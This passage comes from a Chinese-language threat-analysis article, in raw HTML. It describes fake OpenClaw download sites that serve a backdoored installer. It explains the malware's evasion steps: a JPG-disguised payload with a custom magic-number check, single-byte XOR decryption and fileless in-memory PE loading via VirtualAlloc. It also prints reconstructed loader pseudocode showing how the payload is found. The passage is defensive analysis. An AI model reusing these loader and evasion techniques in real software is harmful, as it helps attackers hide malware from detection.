①：cc-openclaw.com.cn</span></strong></p><p data-line="27" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">深色系 UI 高度还原了 OpenClaw 官网风格，顶栏设有&#34;安装下载&#34;、&#34;Skills商店&#34;、&#34;平台对接&#34;等导航入口，页面中央是醒目的红色&#34;安装下载&#34;按钮，旁边还贴心地放置了&#34;在线体验&#34;和&#34;GitHub&#34;跳转入口，底部罗列了 Windows / macOS / Linux / Android / iOS 全平台图标——一切都在努力营造&#34;这是一个正规开源项目&#34;的假象。</span></p><figure data-line="29" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.49074074074074076" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027964" src="https://wechat2rss.xlab.app/img-proxy/?k=9980c395&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwVx9MYLiaUsFMvvo0GrDQRnUpMEyA9q53aAqiaFyicnKNibbjfbOqFuMXnia6JEgHIPXjcuicUvRlOCawFN18ZIQaugOBz9icEXgxVFG0%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="32" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">站点 ②：zh-openclaw.com.cn</span></strong></p><p data-line="34" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这个站点走的是&#34;开发者友好&#34;路线。页面模拟了一个终端窗口，展示伪造的安装命令（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">npm i -g openclaw</span></code><span leaf="">、</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">git clone</span></code><span leaf="">），下方还有一个 &#34;Companion App (Beta)&#34; 下载区域。截图右上角清晰可见浏览器正在下载 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">openclaw1.1.zip</span></code><span leaf="">——这就是那个携带后门的安装包。</span></p><figure data-line="36" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5175925925925926" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027960" src="https://wechat2rss.xlab.app/img-proxy/?k=ab07a41c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwUQ1WcVvcpj8CsTHnfjU0M1lY2L2GSWSq2wD2jwrS0DuKEROAz8vGWdUEBcQMXbuaeMibXxHzSDKQvyxpszZEib4loWy5jhnm2qs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="39" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">站点 ③：wap-openclaw.com.cn</span></strong></p><p data-line="41" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">紫色主题，视觉冲击力最强的一个。巨大的标题&#34;</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">让 AI 真正为你工作</span></strong><span leaf="">&#34;配合赛博朋克风格的龙虾渲染图，页面顶部标注&#34;MIT 开源协议 | 完全免费&#34;来打消用户疑虑，底部还虚构了&#34;10,000+ 开发者正在使用&#34;的数据。</span></p><figure data-line="43" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5157407407407407" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027961" src="https://wechat2rss.xlab.app/img-proxy/?k=95a4773d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwU3lOSQ2ibDTWrUzxJmoPZ2Kl6n4qHibePFAxicVeSkhRd4CT4B7xDa0fQGiaMribvCtetdxlhFweP0bs0TmWjGicPTH2WQ0xtPMfFuM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="46" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">站点 ④：openclaw-cc.com.cn</span></strong></p><p data-line="48" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">浅色红色主题，主打&#34;</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">真正能做事的人工智能</span></strong><span leaf="">&#34;。这个站点最有意思的是底部精心伪造的用户评价区——John Doe（Software Developer）、Alice Smith（Product Manager）、Mike Johnson（Marketing Director）——三个虚构人物给出了热情洋溢的五星好评。攻击者对社会工程学的运用可见一斑。</span></p><figure data-line="50" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5175925925925926" data-type="png" data-w="1080" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027963" src="https://wechat2rss.xlab.app/img-proxy/?k=a4d2a531&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwXZjfdUJBIyayG7oDhWtIMzynu80ibevRIwricflQagGCib3nyvQTMPAVz0RMvz2ThOb3mOweFQyiauMf6CEa3DejTTcwHoMemst8I%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="53" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">无论用户访问哪个站点，点击下载按钮后获取的都是同一个文件：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">openclaw1.1.zip</span></code></strong><span leaf="">，托管在某云厂商 OSS 的新加坡节点上。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="57" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">第二阶段：披着龙虾外衣的后门</span></h2><p data-line="59" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">解压安装包后，用户看到的是一个&#34;OpenClaw 一键部署&#34;工具。界面上展示着各种诱人的功能模块——自动操作电脑、浏览网页生成简报、跟踪行情趋势、归纳整理文件、手机远程指挥电脑——正中间是一个大大的&#34;</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">点击立即部署 &gt;&gt;</span></strong><span leaf="">&#34;按钮。</span></p><figure data-line="61" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6403425309229306" data-type="png" data-w="1051" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027962" src="https://wechat2rss.xlab.app/img-proxy/?k=1b5255f6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwW3nIw48wTEYfX5ocbWWnvLnhGKB8fshCGIDjgky43I4Gan8IsKcD7FyolgDqoHaQibMTKR5pSBFcdZ6lTsmnwBGojB2fyDel9w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><p data-line="64" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">然而，这个部署工具的真正目的并不是帮你部署 AI 助手。点击按钮的那一刻，一条精心设计的攻击链已经悄然启动。</span></p><p data-line="66" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">样本执行后会释放出2个关键恶意文件：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">iusb3mon.exe + ziliao.jpg</span></code></strong><span leaf="">。</span></p><p data-line="68" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">从文件名和扩展名来看，它像是一张普普通通的图片。但事实远非如此。</span></p><hr style="border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;margin: 2em 0px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="72" style="display: block;width: fit-content;padding: 0.3em 1.2em;margin: 2.5em auto 1.5em;color: rgb(255, 255, 255);background: rgb(0, 82, 217);font-size: calc(19.2px);font-weight: bold;text-align: center;border-radius: 6px;box-shadow: none;"><span leaf="">第三阶段：一张 JPG 图片里的杀机</span></h2><h3 data-line="74" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">魔数校验——只有&#34;对的钥匙&#34;才能打开</span></h3><p data-line="76" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">iusb3mon.exe 读取 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ziliao.jpg</span></code><span leaf=""> 后，并不会急于执行任何操作，而是先对文件头部进行严格的握手验证：</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">前 4 字节</span></strong><span leaf="">必须精确匹配 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x7B7FE992</span></code><span leaf="">（小端字节序：</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">92 E9 7F 7B</span></code><span leaf="">）</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">第 5 字节</span></strong><span leaf="">必须为 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x7B</span></code></p></li></ul><p data-line="81" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">这是攻击者设计的自定义魔数校验。如果文件头部不匹配，程序直接退出——不报错、不留痕。 下面是 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ziliao.jpg</span></code><span leaf=""> 的十六进制视图，开头的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">92 E9 7F 7B</span></code><span leaf=""> 魔数清晰可见：</span></p><figure data-line="84" style="margin: 1.5em 8px;color: rgb(51, 51, 51);"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5646879756468798" data-type="png" data-w="657" style="display: block;max-width: 100%;margin: 0.5em auto 1em;border-radius: 4px;box-shadow: rgba(0, 0, 0, 0.12) 0px 2px 12px;" data-imgfileid="100027965" src="https://wechat2rss.xlab.app/img-proxy/?k=ff7f4c73&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwWwm8NxKSuiamm78iaNj4BGjtoWOTwswbpNf2ykicHzDhQWiaicVTSmiaogSIDxhLoIstTye2mLqHYKmXuUiaRMyM54t84FTNdt7pldCU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></figure><h3 data-line="87" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">XOR 0x7B——简单粗暴但有效的解密</span></h3><p data-line="89" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">魔数校验通过后，程序对整个文件逐字节执行异或解密：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">c</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="c" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">buf[i] ^= </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x7B</span></span><span leaf="">;</span></p></code></pre></div><p data-line="95" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">单字节 XOR——这可能是最朴素的加密方式，却足以骗过大多数基于文件签名的静态检测引擎。加密后的文件既不是合法的 JPG，也不会被识别为 PE 可执行文件，在杀软眼中它就是一堆无意义的二进制数据。</span></p><h3 data-line="97" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">内存加载——永不落地的幽灵</span></h3><p data-line="99" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">解密后的数据揭示了 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ziliao.jpg</span></code><span leaf=""> 的真实身份：</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">一段 shellcode stub + 内嵌的 PE 可执行文件</span></strong><span leaf="">。</span></p><ul style="list-style-type: disc;padding-left: 1.5em;margin-left: 0px;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">前段</span></strong><span leaf="">：一段精巧的加载器代码（shellcode stub），负责定位和映射后方的 PE</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 0px;padding: 0px;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">偏移 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">0x5BF</span></code><span leaf=""> 处</span></strong><span leaf="">：完整的 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">MZ</span></code><span leaf=""> PE 头浮出水面</span></p></li></ul><p data-line="104" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">程序随即调用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">VirtualAlloc</span></code><span leaf=""> 分配一块带有执行权限的内存区域，将解密后的数据拷贝进去，然后直接跳转执行。</span></p><p data-line="106" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">从头到尾，</span><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">恶意 PE 从未以文件形式出现在磁盘上</span></strong><span leaf="">——这就是经典的 Fileless（无文件）内存加载技术。</span></p><h3 data-line="108" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">载荷搜索路径——三次机会，一个目标</span></h3><p data-line="110" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">通过逆向分析，我们还原了 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">ziliao.jpg</span></code><span leaf=""> 的搜索路径逻辑。程序会依次在以下位置查找这张&#34;图片&#34;：</span></p><p style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">① C:\Users\</span><span style="color: rgb(76, 129, 201);"><span leaf="">&lt;</span></span><span leaf="">username</span><span style="color: rgb(76, 129, 201);"><span leaf="">&gt;</span></span><span leaf="">\Desktop\ziliao.jpg       ← 当前用户桌面</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">② </span><span style="color: rgb(76, 129, 201);"><span leaf="">&lt;</span></span><span leaf="">AppData</span><span style="color: rgb(76, 129, 201);"><span leaf="">&gt;</span></span><span leaf="">\</span><span style="color: rgb(0, 72, 171);"><span leaf="">Local</span></span><span leaf="">\ziliao.jpg                    ← AppData\</span><span style="color: rgb(0, 72, 171);"><span leaf="">Local</span></span><span leaf=""> 目录</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">③ C:\Users\</span><span style="color: rgb(76, 129, 201);"><span leaf="">&lt;</span></span><span leaf="">username</span><span style="color: rgb(76, 129, 201);"><span leaf="">&gt;</span></span><span leaf="">\AppData\</span><span style="color: rgb(0, 72, 171);"><span leaf="">Local</span></span><span leaf="">\</span><span style="color: rgb(0, 72, 171);"><span leaf="">Local</span></span><span leaf="">\ziliao.jpg</span></p></code></pre></p><p data-line="118" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">三个路径逐一尝试，只要有一处命中就启动后续攻击链。这种多路径容错设计说明攻击者充分考虑了不同安装场景下文件的可能落点。</span></p><h3 data-line="120" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 2em 8px 0.75em 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.2;"><span leaf="">关键代码实证</span></h3><p data-line="122" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">以下是静态分析得到的载荷搜索与加载核心逻辑：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);"><span style="font-size: 11px;line-height: 1.4;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">c</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="c" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">def </span><span style="color: rgb(0, 72, 171);"><span leaf="">loader</span></span><span leaf="">()</span><span leaf="">:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    # 初始化文件名缓冲区（260字节）</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    filename = bytearray(</span><span style="color: rgb(76, 129, 201);"><span leaf="">260</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    # 构建文件路径</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    filename = </span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;ziliao.jpg&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    # 尝试打开文件 (</span><span style="color: rgb(76, 129, 201);"><span leaf="">0x80000000</span></span><span leaf=""> = GENERIC_READ, </span><span style="color: rgb(76, 129, 201);"><span leaf="">3</span></span><span leaf=""> = OPEN_EXISTING)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    file_handle = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ, </span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                              None, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, None)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    # 如果文件打开失败</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> file_handle == INVALID_HANDLE_VALUE:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        # 获取当前用户名</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        username_buffer = bytearray(</span><span style="color: rgb(76, 129, 201);"><span leaf="">260</span></span><span leaf="">)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        buffer_size = </span><span style="color: rgb(76, 129, 201);"><span leaf="">260</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> not GetUserNameA(username_buffer, buffer_size):</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            buffer_size = </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        # 尝试从桌面路径加载文件</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        filename = f</span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;C:\\Users\\{username}\\Desktop\\ziliao.jpg&#34;</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">        # 如果路径构建成功（长度检查）</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> len(filename) &lt;= </span><span style="color: rgb(76, 129, 201);"><span leaf="">0x103</span></span><span leaf="">:  # </span><span style="color: rgb(76, 129, 201);"><span leaf="">259</span></span><span leaf=""> + </span><span style="color: rgb(76, 129, 201);"><span leaf="">1</span></span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            file_handle = CreateFileA(filename, GENERIC_READ, FILE_SHARE_READ,</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">                                      None, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, None)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">            # 继续尝试其他路径...</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    # 获取文件大小</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    file_size = GetFileSize(file_handle, None)</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span leaf="">    # 如果文件无效或为空，静默退出</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">if</span></span><span leaf=""> file_size == </span><span style="color: rgb(76, 129, 201);"><span leaf="">-1</span></span><span leaf=""> or file_size == </span><span style="color: rgb(76, 129, 201);"><span leaf="">0</span></span><span leaf="">:</span></p><p style="margin: 0px;padding: 0px;line-height: 1.5;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">return</span></span><span leaf="">  # 静默退出</span></p></code></pre></div><p data-line="161" style="margin: 1.5em 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><span leaf="">可以看到，代码使用 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">GetUserNameA</span></code><span leaf=""> 动态获取当前用户名，拼接出完整的文件路径。如果第一个路径打不开文件（</span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">CreateFileA</span></code><span leaf=""> 返回 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);padding: 3px 5px;border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="">-1</span></code><span leaf="">），就尝试下一个——直到找到 </span><code style="font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 